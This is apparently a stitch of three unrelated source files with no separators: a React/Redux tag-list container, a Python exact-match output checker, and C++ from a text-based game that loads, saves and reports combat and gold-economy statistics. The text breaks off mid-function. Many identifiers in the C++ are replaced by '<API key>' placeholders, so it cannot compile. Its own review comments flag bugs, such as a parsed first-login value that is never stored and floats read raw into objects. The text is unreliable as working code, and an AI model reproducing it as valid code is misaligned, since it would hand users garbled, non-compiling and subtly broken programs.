 * component's `tags` prop, skipping internal bookkeeping keys.
 * Returns an empty list when no feature is selected.
 */
const mapStateToProps = (state) => {
  const feature = state.selectedFeature.feature
  let taglist = []
  if (state.selectedFeature.hasFeature) {
    Object.keys(feature).forEach(function (key) {
      // Array.prototype.includes replaces the jQuery $.inArray call --
      // no reason to pull in jQuery for a simple membership test.
      if (ignoredTags.includes(key)) {
        return
      }
      taglist.push({
        key: key,
        value: feature[key]
      })
    })
  }
  return {
    tags: taglist
  }
}
// Container component: TagList wired to the selected feature's tags.
const FeatureDetails = connect(
  mapStateToProps
)(TagList)

export default FeatureDetails
from . import Checker
class ExactChecker(Checker):
    """Checker that accepts a submission only on a byte-exact output match."""

    async def check(self, sandbox, task):
        # Compare the sandbox's captured output file with the expected
        # testcase output, then record acceptance and verdict on the task.
        expected = task.testcase.output
        produced = await sandbox.read("/tmp/output.txt")
        matched = produced == expected
        task.accepted = matched
        task.verdict = "AC" if matched else "WA"
#include <cstdio>
#include "core/logging.h"
#include "misc/being.h"
#include "misc/statistics.h"
#include "sys/systemtask.h"
#include "misc/extern.h"
#include "sys/process.h"
// Aggregate game-play statistics (combat, leveling, regen, economy).
GameStats stats;

// statistics for info command
unsigned int gDescriptorUpdates = 0;
unsigned long <API key> = 0;
unsigned int gHBsSinceReboot = 0;
// Socket I/O counters for the current heartbeat, plus observed maxima
// per heartbeat / round / process.
unsigned int gReadThisHB = 0;
unsigned int gWriteThisHB = 0;
unsigned int gMaxReadHB = 0;
unsigned int gMaxWriteHB = 0;
unsigned int gMaxReadRound = 0;
unsigned int gMaxWriteRound = 0;
unsigned int gMaxReadProcess = 0;
unsigned int gMaxWriteProcess = 0;
// Lifetime byte counters.
unsigned long gBytesRead = 0;
unsigned long gBytesSent = 0;
// Gold flow tracking: net (signed) and positive-only totals, per money
// type and per level bucket, plus a clamped modifier per money type.
long gold_statistics[MAX_MONEY_TYPE][MAX_IMMORT];
long gold_positive[MAX_MONEY_TYPE][MAX_IMMORT];
TGoldModifier gold_modifier[MAX_MONEY_TYPE];
// Set the clamp bounds (min, max) on every gold modifier: 1%..100x for
// all types except mob income, which bottoms out at 25%.
void <API key>()
{
  gold_modifier[GOLD_XFER          ].setMM(0.01, 100.0);
  gold_modifier[GOLD_INCOME        ].setMM(0.25, 100.0);
  gold_modifier[GOLD_REPAIR        ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP          ].setMM(0.01, 100.0);
  gold_modifier[GOLD_COMM          ].setMM(0.01, 100.0);
  gold_modifier[GOLD_HOSPITAL      ].setMM(0.01, 100.0);
  gold_modifier[GOLD_GAMBLE        ].setMM(0.01, 100.0);
  gold_modifier[GOLD_RENT          ].setMM(0.01, 100.0);
  gold_modifier[GOLD_DUMP          ].setMM(0.01, 100.0);
  gold_modifier[GOLD_TITHE         ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_SYMBOL   ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_WEAPON   ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_ARMOR    ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_PET      ].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_FOOD     ].setMM(0.01, 100.0);
  gold_modifier[<API key>].setMM(0.01, 100.0);
  gold_modifier[GOLD_SHOP_RESPONSES].setMM(0.01, 100.0);
}
// Load persistent game statistics from File::STATS: login count,
// repair/help counters, per-immortal-bucket gold flow (net and
// positive-only), gold modifiers, equipment load rate, per-class
// leveling data and the first-login timestamp.  Hard-coded tuning
// defaults are set first.  Returns TRUE on success (and backs the file
// up), FALSE when the stats file cannot be opened.
int init_game_stats(void)
{
  int i, j;
  FILE *fp;
  char buf[256];
  // Tuning defaults; the values below are not read from the file.
  stats.<API key>[MOB_STAT] = 2;
  stats.<API key>[PC_STAT] = 4;
  //stats.equip = 0.7;  // this affects the load rate of things
  stats.max_exist = 1.2;  // this affects the MAX number of a thing allowed
  // 1.40 resulted in 16-20 days playtime to L50
  // 1.05 resulted in 25-30 day to L50 (4.1)
  // 0.80 had reasonable rages for 4.5 beta
  // 5.2 will be more challenging
  // july 2001 - these stands need to be adjusted for speed changes...
  // rounds are slower now, so we need to eat up a 5/3 adjustment
  // see comm.h for the first part of the compensation
  stats.xp_modif = 0.65;  // people had is too easy in 5.0-5.1
  //stats.xp_modif = 0.86;
  // this affects damage applied.
  // it should be used to slow down or speed up fights
  // i.e. lowering it causes less damage to be applied, so fights take longer
  // c.f. balance notes for complete discussion
  // value of 1.0 makes fair fights take about 30 rounds = 90 seconds
  // a value of 0.75 should make for 120 second fights
  // 5.0-5.1 was too easy and too fast
  // people could level to 50 in 2-6 play days
  // this should be better for 5.2
  stats.damage_modifier = 0.65;
  //stats.damage_modifier = 0.86;
  if (!(fp = fopen(File::STATS,"r"))) {
    vlogf(LOG_BUG, "Unable to open txt/stat file");
    return FALSE;
  } else {
    if (fscanf(fp, "%ld\n", &stats.logins) != 1) {
      vlogf(LOG_BUG, "bad stats.logins");
    }
    if (fscanf(fp, "%d %d\n", &repair_number, &total_help_number) != 2) {
      repair_number = 0;
      total_help_number = 0;
      vlogf(LOG_BUG, "bad repair_number");
      vlogf(LOG_BUG, "bad help_number");
    }
    // Per-bucket gold rows: the field order here must mirror
    // save_game_stats() exactly.  A short read zeroes the whole bucket.
    for (i= 0; i < MAX_IMMORT; i++) {
      if (fscanf(fp, " %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
          &gold_statistics[GOLD_INCOME][i],
          &gold_statistics[GOLD_SHOP][i],
          &gold_statistics[GOLD_REPAIR][i],
          &gold_statistics[GOLD_COMM][i],
          &gold_statistics[GOLD_HOSPITAL][i],
          &gold_statistics[GOLD_GAMBLE][i],
          &gold_statistics[GOLD_RENT][i],
          &gold_statistics[GOLD_TITHE][i],
          &gold_statistics[GOLD_SHOP_FOOD][i],
          &gold_statistics[<API key>][i],
          &gold_statistics[GOLD_SHOP_SYMBOL][i],
          &gold_statistics[GOLD_SHOP_ARMOR][i],
          &gold_statistics[GOLD_SHOP_WEAPON][i],
          &gold_statistics[GOLD_SHOP_PET][i],
          &gold_statistics[GOLD_SHOP_RESPONSES][i],
          &gold_statistics[GOLD_DUMP][i]) != 16) {
        vlogf(LOG_BUG, format("bad gold info, resetting %d") % i);
        int j;
        for (j = 0; j < MAX_MONEY_TYPE; j++)
          gold_statistics[j][i] = 0;
      }
      if (fscanf(fp, " %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
          &gold_positive[GOLD_INCOME][i],
          &gold_positive[GOLD_SHOP][i],
          &gold_positive[GOLD_REPAIR][i],
          &gold_positive[GOLD_COMM][i],
          &gold_positive[GOLD_HOSPITAL][i],
          &gold_positive[GOLD_GAMBLE][i],
          &gold_positive[GOLD_RENT][i],
          &gold_positive[GOLD_TITHE][i],
          &gold_positive[GOLD_SHOP_FOOD][i],
          &gold_positive[<API key>][i],
          &gold_positive[GOLD_SHOP_SYMBOL][i],
          &gold_positive[GOLD_SHOP_ARMOR][i],
          &gold_positive[GOLD_SHOP_WEAPON][i],
          &gold_positive[GOLD_SHOP_PET][i],
          &gold_positive[GOLD_SHOP_RESPONSES][i],
          &gold_positive[GOLD_DUMP][i]) != 16) {
        vlogf(LOG_BUG, format("bad gold info, resetting %d") % i);
        int j;
        for (j = 0; j < MAX_MONEY_TYPE; j++)
          gold_positive[j][i] = 0;
      }
    }
    // NOTE(review): this scans raw %f values directly over TGoldModifier
    // objects; save_game_stats() writes getVal(), so this only works if
    // the value is the leading float member of TGoldModifier -- confirm.
    if (fscanf(fp, " %f %f %f %f %f %f %f %f %f %f %f %f %f %f %f %f\n",
        &gold_modifier[GOLD_INCOME],
        &gold_modifier[GOLD_SHOP],
        &gold_modifier[GOLD_REPAIR],
        &gold_modifier[GOLD_COMM],
        &gold_modifier[GOLD_HOSPITAL],
        &gold_modifier[GOLD_GAMBLE],
        &gold_modifier[GOLD_RENT],
        &gold_modifier[GOLD_TITHE],
        &gold_modifier[GOLD_SHOP_FOOD],
        &gold_modifier[<API key>],
        &gold_modifier[GOLD_SHOP_SYMBOL],
        &gold_modifier[GOLD_SHOP_ARMOR],
        &gold_modifier[GOLD_SHOP_WEAPON],
        &gold_modifier[GOLD_SHOP_PET],
        &gold_modifier[GOLD_SHOP_RESPONSES],
        &gold_modifier[GOLD_DUMP]) != 16) {
      vlogf(LOG_BUG, format("bad gold modifier info, resetting %d") % i);
      int j;
      for (j = 0; j < MAX_MONEY_TYPE; j++)
        gold_modifier[j] = 1.0;
    }
    // Re-apply the clamp bounds after the raw read above.
    <API key>();
    if (fscanf(fp, "%f\n", &stats.equip) != 1) {
      vlogf(LOG_BUG, "bad value for equipment load rate");
    }
    // Per-class counts and cumulative times for levels 1..50.
    for (i = 0; i < 50; i++) {
      for (j = 0; j < MAX_CLASSES; j++) {
        if (fscanf(fp, "%d %ld ",
             &stats.levels[j][i], &stats.time_levels[j][i]) != 2) {
          vlogf(LOG_BUG, format("Bad level info, class %d, lev %d") % j % (i+1));
        }
      }
    }
    // NOTE(review): on a successful read the parsed value stays in `fl`
    // and is never copied back into stats.first_login -- looks like a
    // dropped assignment; only the failure branch sets the field.
    long fl=(long)stats.first_login;
    if (fscanf(fp, "%ld\n", &fl) != 1) {
      vlogf(LOG_BUG, "Bad first_login info, resetting.");
      time_t tnow;
      time(&tnow);
      stats.first_login = tnow;
      stats.logins = 0;
    }
    fclose(fp);
    // Keep a backup copy of the file we just read successfully.
    sprintf(buf, "cp %s %s", File::STATS, File::STATS_BAK);
    vsystem(buf);
    return TRUE;
  }
}
// Persist the counters loaded by init_game_stats() back to File::STATS,
// in exactly the field order the loader expects.
void save_game_stats(void)
{
  FILE *fp;
  int i, j;
  if ((fp = fopen(File::STATS,"w+")) != NULL) {
    fprintf(fp, "%ld\n", stats.logins);
    fprintf(fp, "%d %d\n", repair_number, total_help_number);
    // One net row and one positive-only row per immortal-level bucket.
    for (i= 0; i < MAX_IMMORT; i++) {
      fprintf(fp, "%ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
        gold_statistics[GOLD_INCOME][i],
        gold_statistics[GOLD_SHOP][i],
        gold_statistics[GOLD_REPAIR][i],
        gold_statistics[GOLD_COMM][i],
        gold_statistics[GOLD_HOSPITAL][i],
        gold_statistics[GOLD_GAMBLE][i],
        gold_statistics[GOLD_RENT][i],
        gold_statistics[GOLD_TITHE][i],
        gold_statistics[GOLD_SHOP_FOOD][i],
        gold_statistics[<API key>][i],
        gold_statistics[GOLD_SHOP_SYMBOL][i],
        gold_statistics[GOLD_SHOP_ARMOR][i],
        gold_statistics[GOLD_SHOP_WEAPON][i],
        gold_statistics[GOLD_SHOP_PET][i],
        gold_statistics[GOLD_SHOP_RESPONSES][i],
        gold_statistics[GOLD_DUMP][i]);
      fprintf(fp, "%ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
        gold_positive[GOLD_INCOME][i],
        gold_positive[GOLD_SHOP][i],
        gold_positive[GOLD_REPAIR][i],
        gold_positive[GOLD_COMM][i],
        gold_positive[GOLD_HOSPITAL][i],
        gold_positive[GOLD_GAMBLE][i],
        gold_positive[GOLD_RENT][i],
        gold_positive[GOLD_TITHE][i],
        gold_positive[GOLD_SHOP_FOOD][i],
        gold_positive[<API key>][i],
        gold_positive[GOLD_SHOP_SYMBOL][i],
        gold_positive[GOLD_SHOP_ARMOR][i],
        gold_positive[GOLD_SHOP_WEAPON][i],
        gold_positive[GOLD_SHOP_PET][i],
        gold_positive[GOLD_SHOP_RESPONSES][i],
        gold_positive[GOLD_DUMP][i]);
    }
    // Modifier values are written via getVal() (cf. the raw %f read in
    // init_game_stats).
    fprintf(fp, "%.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f\n",
      gold_modifier[GOLD_INCOME].getVal(),
      gold_modifier[GOLD_SHOP].getVal(),
      gold_modifier[GOLD_REPAIR].getVal(),
      gold_modifier[GOLD_COMM].getVal(),
      gold_modifier[GOLD_HOSPITAL].getVal(),
      gold_modifier[GOLD_GAMBLE].getVal(),
      gold_modifier[GOLD_RENT].getVal(),
      gold_modifier[GOLD_TITHE].getVal(),
      gold_modifier[GOLD_SHOP_FOOD].getVal(),
      gold_modifier[<API key>].getVal(),
      gold_modifier[GOLD_SHOP_SYMBOL].getVal(),
      gold_modifier[GOLD_SHOP_ARMOR].getVal(),
      gold_modifier[GOLD_SHOP_WEAPON].getVal(),
      gold_modifier[GOLD_SHOP_PET].getVal(),
      gold_modifier[GOLD_SHOP_RESPONSES].getVal(),
      gold_modifier[GOLD_DUMP].getVal());
    fprintf(fp, "%f\n", stats.equip);
    // Per-class leveling counts/times for levels 1..50.
    for (i = 0; i < 50; i++) {
      for (j = 0; j < MAX_CLASSES; j++) {
        fprintf(fp, "%d %ld ", stats.levels[j][i], stats.time_levels[j][i]);
      }
      fprintf(fp, "\n");
    }
    fprintf(fp, "%ld\n", (long) stats.first_login);
    fclose(fp);
  } else {
    vlogf(LOG_BUG, format("Error writing %s") % File::STATS);
  }
}
// Immortal command "gamestats": report one statistic group --
// "attributes" (stat curve plots), "combat" (damage/hit/crit totals),
// "equipment" (economy modifiers), "trivia" (regen averages), "levels"
// (per-level death and leveling data) -- or queue the full statistics
// system task.  Requires POWER_GAMESTATS.
void TBeing::doGamestats(const sstring &arg)
{
  sstring buf, buf2;
  int lev, i;
  sstring str;
  if (powerCheck(POWER_GAMESTATS))
    return;
  buf=arg.word(0);
  buf2=arg.word(1);
  if(buf.empty()){
    sendTo("Syntax: gamestats <attributes | combat | equipment | levels | trivia | statistics>\n\r");
    return;
  } else if (is_abbrev(buf, "attributes")) {
    // Plot the stat curve for STR across 5..205 at an optional
    // caller-supplied curve exponent (default 1.4).  The being's real
    // STR is saved and restored around the sweep.
    int temp_stat = getStat(STAT_CURRENT, STAT_STR);
    double plot1 = 0;
    double plot2 = 0;
    double curve;
    if(buf2.empty()){
      curve = 1.4;
    } else
      curve = convertTo<float>(buf2);
    for(int tmpint = 5; tmpint <= 205; tmpint += 5) {
      setStat(STAT_CURRENT, STAT_STR, tmpint);
      plot1 = plotStat(STAT_CURRENT, STAT_STR, .80, 1.25, 1.00, curve);
      plot2 = plotStat(STAT_CURRENT, STAT_STR, 0.0, 100.0, 50.0, curve);
      buf = format("Stat Value: %5.2f  Plot1: %5.2f  Plot2: %5.2f%c\n\r") % (double)tmpint % plot1 % plot2 % '%';
      sendTo(buf);
    }
    setStat(STAT_CURRENT, STAT_STR, temp_stat);
    return;
  } else if (is_abbrev(buf, "combat")) {
    // Damage totals split by PC vs mob, with percentage shares.
    int tot_dam = stats.damage[PC_STAT] + stats.damage[MOB_STAT];
    buf = format("Total damage taken : %d\n\r") % tot_dam;
    str += buf;
    buf = format("\tMob damage taken : %ld (%5.2f%c)\n\r") %
      stats.damage[MOB_STAT] % (tot_dam ? (100.0 * stats.damage[MOB_STAT] / tot_dam) : 0) % '%';
    str += buf;
    buf = format("\tPC damage taken : %ld (%5.2f%c)\n\r") %
      stats.damage[PC_STAT] % (tot_dam ? (100.0 * stats.damage[PC_STAT] / tot_dam) : 0) % '%';
    str += buf;
    tot_dam = stats.combat_damage[PC_STAT] + stats.combat_damage[MOB_STAT];
    buf = format("Combat damage only : %d\n\r") % tot_dam;
    str += buf;
    buf = format("\tMob combat damage taken : %ld (%5.2f%c)\n\r") %
      stats.combat_damage[MOB_STAT] % (tot_dam ? (100.0 * stats.combat_damage[MOB_STAT] / tot_dam) : 0) % '%';
    str += buf;
    buf = format("\tPC combat damage taken : %ld (%5.2f%c)\n\r") %
      stats.combat_damage[PC_STAT] % (tot_dam ? (100.0 * stats.combat_damage[PC_STAT] / tot_dam) : 0) % '%';
    str += buf;
    // Armor-class absorption, relative both to all absorption and to
    // each side's combat damage.
    int tot_ac = stats.ac_absorb[MOB_STAT] + stats.ac_absorb[PC_STAT];
    buf = format("AC damage absorbed : %d\n\r") % tot_ac;
    str += buf;
    int mob_dam = stats.ac_absorb[MOB_STAT] + stats.combat_damage[MOB_STAT];
    buf = format("\tMob AC absorb : %ld (%5.2f%c of all abs) (%5.2f%c of mob ComDam)\n\r") %
      stats.ac_absorb[MOB_STAT] % (tot_ac ? stats.ac_absorb[MOB_STAT] * 100.0 / tot_ac : 0) % '%' %
      (mob_dam ? stats.ac_absorb[MOB_STAT] * 100.0 / mob_dam : 0) % '%';
    str += buf;
    int pc_dam = stats.ac_absorb[PC_STAT] + stats.combat_damage[PC_STAT];
    buf = format("\tPC AC absorb : %ld (%5.2f%c of all abs) (%5.2f%c of PC ComDam)\n\r") %
      stats.ac_absorb[PC_STAT] % (tot_ac ? stats.ac_absorb[PC_STAT] * 100.0 / tot_ac : 0) % '%' %
      (pc_dam ? stats.ac_absorb[PC_STAT] * 100.0 / pc_dam : 0) % '%';
    str += buf;
    buf = format("Current absorbtion constants : TBeing %d, PC %d\n\r\n\r") %
      stats.<API key>[MOB_STAT] %
      stats.<API key>[PC_STAT];
    str += buf;
    // Swing counts and hit rates.
    long tot_blows = stats.combat_blows[PC_STAT] + stats.combat_blows[MOB_STAT];
    buf = format("Total Combat blows : %ld\n\r") % tot_blows;
    str += buf;
    buf = format("\tMob combat blows : %ld (%5.2f%c)\n\r") %
      stats.combat_blows[MOB_STAT] %
      (tot_blows ? (100.0 * stats.combat_blows[MOB_STAT] / tot_blows) : 0) %
      '%';
    str += buf;
    buf = format("\tPC combat blows : %ld (%5.2f%c)\n\r") %
      stats.combat_blows[PC_STAT] %
      (tot_blows ? (100.0 * stats.combat_blows[PC_STAT] / tot_blows) : 0) %
      '%';
    str += buf;
    long tot_hits = stats.combat_hits[PC_STAT] + stats.combat_hits[MOB_STAT];
    buf = format("Total Combat hits : %ld (%5.2f%c)\n\r") %
      tot_hits % (tot_blows == 0 ? 0.0 : (100.0 * tot_hits / tot_blows)) % '%';
    str += buf;
    buf = format("\tMob combat hits : %ld (%5.2f%c) (%5.2f%c hit rate)\n\r") %
      stats.combat_hits[MOB_STAT] % (tot_hits ? (100.0 * stats.combat_hits[MOB_STAT] / tot_hits) : 0) % '%' %
      (stats.combat_blows[MOB_STAT] ? stats.combat_hits[MOB_STAT] * 100.0 / stats.combat_blows[MOB_STAT] : 0) % '%';
    str += buf;
    buf = format("\tPC combat hits : %ld (%5.2f%c) (%5.2f%c hit rate)\n\r") %
      stats.combat_hits[PC_STAT] % (tot_hits ? (100.0 * stats.combat_hits[PC_STAT] / tot_hits) : 0 ) % '%' %
      (stats.combat_blows[PC_STAT] ? stats.combat_hits[PC_STAT] * 100.0 / stats.combat_blows[PC_STAT] : 0) % '%';
    str += buf;
    // Average combat level and damage per swing/hit.
    int tot_lev = stats.combat_level[PC_STAT] + stats.combat_level[MOB_STAT];
    buf = format("Average Combat level : %5.2f\n\r") %
      (tot_blows ? ((double) tot_lev / (double) tot_blows) : 0.0);
    str += buf;
    buf = format("\tMob combat level : %5.2f\n\r") %
      (stats.combat_blows[MOB_STAT] ? ((double) stats.combat_level[MOB_STAT] / (double) stats.combat_blows[MOB_STAT]) : 0.0);
    str += buf;
    buf = format("\tPC combat level : %5.2f\n\r") %
      (stats.combat_blows[PC_STAT] ? ((double) stats.combat_level[PC_STAT] / (double) stats.combat_blows[PC_STAT]) : 0.0);
    str += buf;
    buf = format("Average Combat damage : %5.2f\n\r") %
      (tot_hits ? ((double) tot_dam / (double) tot_hits) : 0.0);
    str += buf;
    buf = format("\tMob avg. combat dam. : %5.2f\n\r") %
      (stats.combat_hits[MOB_STAT] ? ((double) stats.combat_damage[MOB_STAT] / (double) stats.combat_hits[MOB_STAT]) : 0.0);
    str += buf;
    buf = format("\tPC avg. combat dam. : %5.2f\n\r") %
      (stats.combat_hits[PC_STAT] ? ((double) stats.combat_damage[PC_STAT] / (double) stats.combat_hits[PC_STAT]) : 0.0);
    str += buf;
    // Critical checks and passes, relative to hits/misses.
    buf = format("Total crit-success checks : %ld (%5.2f%c of hits)\n\r") %
      stats.combat_crit_suc %
      (tot_hits == 0 ? 0.0 :
       (100.0 * stats.combat_crit_suc / tot_hits)) % '%';
    str += buf;
    buf = format("Total crit-fail checks : %ld (%5.2f%c of misses)\n\r") %
      stats.combat_crit_fail %
      ((tot_blows - tot_hits) == 0 ? 0.0 :
       (100.0 * stats.combat_crit_fail / (tot_blows - tot_hits))) % '%';
    str += buf;
    buf = format("Total crit-success passes : %ld (%5.2f%c of hits)\n\r") %
      stats.<API key> %
      (tot_hits == 0 ? 0.0 :
       (100.0 * stats.<API key> / tot_hits)) % '%';
    str += buf;
    buf = format("Total crit-fail passes : %ld (%5.2f%c of misses)\n\r") %
      stats.<API key> %
      ((tot_blows - tot_hits) == 0 ? 0.0 :
       (100.0 * stats.<API key> / (tot_blows - tot_hits))) % '%';
    str += buf;
    str += "\n\r";
    buf = format("Mobiles have tried to aggro : %d times.\n\r") % stats.aggro_attempts;
    str += buf;
    buf = format("Mobiles have aggro'd : %d times.\n\r") % stats.aggro_successes;
    str += buf;
    if (desc)
      desc->page_string(str, SHOWNOW_NO, ALLOWREP_YES);
    return;
  } else if (is_abbrev(buf, "equipment")) {
    // Current economy / balance modifiers.
    sendTo(format("Current Equipment Load Modifier : %4.2f\n\r") % stats.equip);
    sendTo(format("Current Max-Exist Modifier : %4.2f\n\r") % stats.max_exist);
    sendTo(format("Current Mob-Money Modifier : %4.2f\n\r") % gold_modifier[GOLD_INCOME].getVal());
    sendTo(format("Current Mob-XP Modifier : %4.2f\n\r") % stats.xp_modif);
    sendTo(format("Current Damage Modifier : %4.2f\n\r") % stats.damage_modifier);
    return;
  } else if (is_abbrev(buf, "trivia")) {
    // Average regeneration per attempt for HP/MV/mana/piety.
    sendTo(format("Average HP regen : %4.2f (attempts : %d)\n\r") % (stats.hit_gained_attempts == 0 ? 0.0 :
         ((float) stats.hit_gained / (float) stats.hit_gained_attempts)) %
         stats.hit_gained_attempts);
    sendTo(format("Average MV regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
         ((float) stats.move_gained / (float) stats.<API key>)) %
         stats.<API key>);
    sendTo(format("Average mana regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
         ((float) stats.mana_gained / (float) stats.<API key>)) %
         stats.<API key>);
    sendTo(format("Average piety regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
         (stats.piety_gained / (float) stats.<API key>)) %
         stats.<API key>);
    return;
  } else if (is_abbrev(buf, "levels")) {
    // Per-level death counts plus per-class leveling times (1..50).
    if(buf2.empty()){
      sendTo("Syntax : gamestats levels <level>\n\r");
      return;
    }
    lev = convertTo<int>(buf2);
    if ((lev >= 0) && (lev < 70)) {
      sendTo(format("Mobile Deaths for level %d, %ld\n\r") % lev % stats.deaths[lev][1]);
      sendTo(format("PC Deaths for level %d, %ld\n\r") % lev % stats.deaths[lev][0]);
      if (lev >= 1 && lev <= 50) {
        sendTo("PC Leveling Data:\n\r");
        unsigned int factor = secs_to_level(lev);
        sendTo(format("Desired leveling time: %s\n\r") %
         secsToString(factor));
        for (i=0;i<MAX_CLASSES;i++) {
          // Inner `factor` intentionally shadows the outer one: this is
          // the observed per-class average, not the design target.
          time_t factor = 0;
          if (stats.levels[i][lev-1])
            factor = SECS_PER_REAL_MIN * stats.time_levels[i][lev-1] / stats.levels[i][lev-1];
          sendTo(format("Class: %-10.10s : number %3d, avg. time: %s\n\r") %
            classInfo[i].name % stats.levels[i][lev-1] %
            secsToString(factor));
        }
      }
      return;
    } else {
      sendTo("Please use a level from 0 - 70 in your level checking.\n\r");
      return;
    }
  } else if (is_abbrev(buf, "statistics")) {
    // Heavy report: delegate to the system task queue.
    systask->AddTask(this, SYSTEM_STATISTICS, "");
    return;
  }
  sendTo("Syntax: gamestats <attributes | combat | equipment | levels | trivia | statistics>\n\r");
  return;
}
// Net gold flow for a single money category: the sum of the per-level
// ledger entries in gold_statistics.  May be negative when the category
// drains more gold out of the game than it puts in.
int getNetGold(moneyTypeT mtt)
{
  int total = 0;
  for (int lev = 0; lev < MAX_MORT; lev++)
    total += gold_statistics[mtt][lev];
  return total;
}
// Gross (positive-only) gold flow for a single money category: the sum
// of the per-level entries in gold_positive across all mortal levels.
unsigned int getPosGold(moneyTypeT mtt)
{
  unsigned int total = 0;
  for (int lev = 0; lev < MAX_MORT; lev++)
    total += gold_positive[mtt][lev];
  return total;
}
// getNetGoldGlobal - net gold flow summed over every tracked money
// category (income, commodities, rent, repair, hospital, gambling,
// tithe, dump, and all shop categories) and over all mortal levels.
// Negative means the economy as a whole is draining player gold.
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator before
// relying on this total.
int getNetGoldGlobal()
{
  int net_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    net_gold += gold_statistics[GOLD_INCOME][i] +
      gold_statistics[GOLD_COMM][i] +
      gold_statistics[GOLD_RENT][i] +
      gold_statistics[GOLD_REPAIR][i] +
      gold_statistics[GOLD_HOSPITAL][i] +
      gold_statistics[GOLD_GAMBLE][i] +
      gold_statistics[GOLD_TITHE][i] +
      gold_statistics[GOLD_DUMP][i] +
      gold_statistics[GOLD_SHOP_FOOD][i] +
      gold_statistics[<API key>][i] +
      gold_statistics[GOLD_SHOP_SYMBOL][i] +
      gold_statistics[GOLD_SHOP_ARMOR][i] +
      gold_statistics[GOLD_SHOP_WEAPON][i] +
      gold_statistics[GOLD_SHOP_RESPONSES][i] +
      gold_statistics[GOLD_SHOP_PET][i] +
      gold_statistics[GOLD_SHOP][i];
  return net_gold;
}
// getPosGoldGlobal - gross (positive-only) gold flow summed over every
// tracked money category and all mortal levels.  Used by the economy
// balancer as a measure of total activity (and as a "have we collected
// enough data yet" threshold).
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator.
unsigned int getPosGoldGlobal()
{
  unsigned int pos_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    pos_gold += gold_positive[GOLD_INCOME][i] +
      gold_positive[GOLD_COMM][i] +
      gold_positive[GOLD_RENT][i] +
      gold_positive[GOLD_REPAIR][i] +
      gold_positive[GOLD_HOSPITAL][i] +
      gold_positive[GOLD_GAMBLE][i] +
      gold_positive[GOLD_DUMP][i] +
      gold_positive[GOLD_TITHE][i] +
      gold_positive[GOLD_SHOP_FOOD][i] +
      gold_positive[<API key>][i] +
      gold_positive[GOLD_SHOP_SYMBOL][i] +
      gold_positive[GOLD_SHOP_ARMOR][i] +
      gold_positive[GOLD_SHOP_WEAPON][i] +
      gold_positive[GOLD_SHOP_PET][i] +
      gold_positive[GOLD_SHOP_RESPONSES][i] +
      gold_positive[GOLD_SHOP][i];
  return pos_gold;
}
// we exclude the shop_pet value in this since it's off-budget, and the
// shop modifier doesn't factor into that price anyways
// getNetGoldShops - net gold flow across the shop categories only
// (food, symbol, armor, weapon, response-mob, and generic shop), summed
// over all mortal levels.  Positive means shops are paying out more
// than they take in.
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator.
int getNetGoldShops()
{
  int net_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    net_gold += gold_statistics[GOLD_SHOP_FOOD][i] +
      gold_statistics[<API key>][i] +
      gold_statistics[GOLD_SHOP_SYMBOL][i] +
      gold_statistics[GOLD_SHOP_ARMOR][i] +
      gold_statistics[GOLD_SHOP_WEAPON][i] +
      gold_statistics[GOLD_SHOP_RESPONSES][i] +
      gold_statistics[GOLD_SHOP][i];
  return net_gold;
}
// getPosGoldShops - gross (positive-only) gold flow across the shop
// categories only, summed over all mortal levels.  Like
// getNetGoldShops(), GOLD_SHOP_PET is deliberately excluded (it is
// off-budget and unaffected by the shop modifier).
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator.
unsigned int getPosGoldShops()
{
  unsigned int pos_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    pos_gold += gold_positive[GOLD_SHOP_FOOD][i] +
      gold_positive[<API key>][i] +
      gold_positive[GOLD_SHOP_SYMBOL][i] +
      gold_positive[GOLD_SHOP_ARMOR][i] +
      gold_positive[GOLD_SHOP_WEAPON][i] +
      gold_positive[GOLD_SHOP_RESPONSES][i] +
      gold_positive[GOLD_SHOP][i];
  return pos_gold;
}
// we don't want income values floating high because PCs spend money
// on bad things (rent, pets)
// getNetGoldBudget - net gold flow over the "on-budget" categories:
// everything in getNetGoldGlobal() except GOLD_RENT and GOLD_SHOP_PET,
// which are treated as off-budget sinks.  Used to decide whether the
// income modifier should be raised or lowered.
// NOTE(review): one category index below appears corrupted/redacted
// ("<API key>") -- confirm the intended moneyTypeT enumerator.
int getNetGoldBudget()
{
  int net_gold = 0;
  int i;
  for (i = 0; i < MAX_MORT; i++)
    net_gold += gold_statistics[GOLD_INCOME][i] +
      gold_statistics[GOLD_COMM][i] +
      gold_statistics[GOLD_REPAIR][i] +
      gold_statistics[GOLD_HOSPITAL][i] +
      gold_statistics[GOLD_GAMBLE][i] +
      gold_statistics[GOLD_TITHE][i] +
      gold_statistics[GOLD_DUMP][i] +
      gold_statistics[GOLD_SHOP_FOOD][i] +
      gold_statistics[<API key>][i] +
      gold_statistics[GOLD_SHOP_SYMBOL][i] +
      gold_statistics[GOLD_SHOP_ARMOR][i] +
      gold_statistics[GOLD_SHOP_WEAPON][i] +
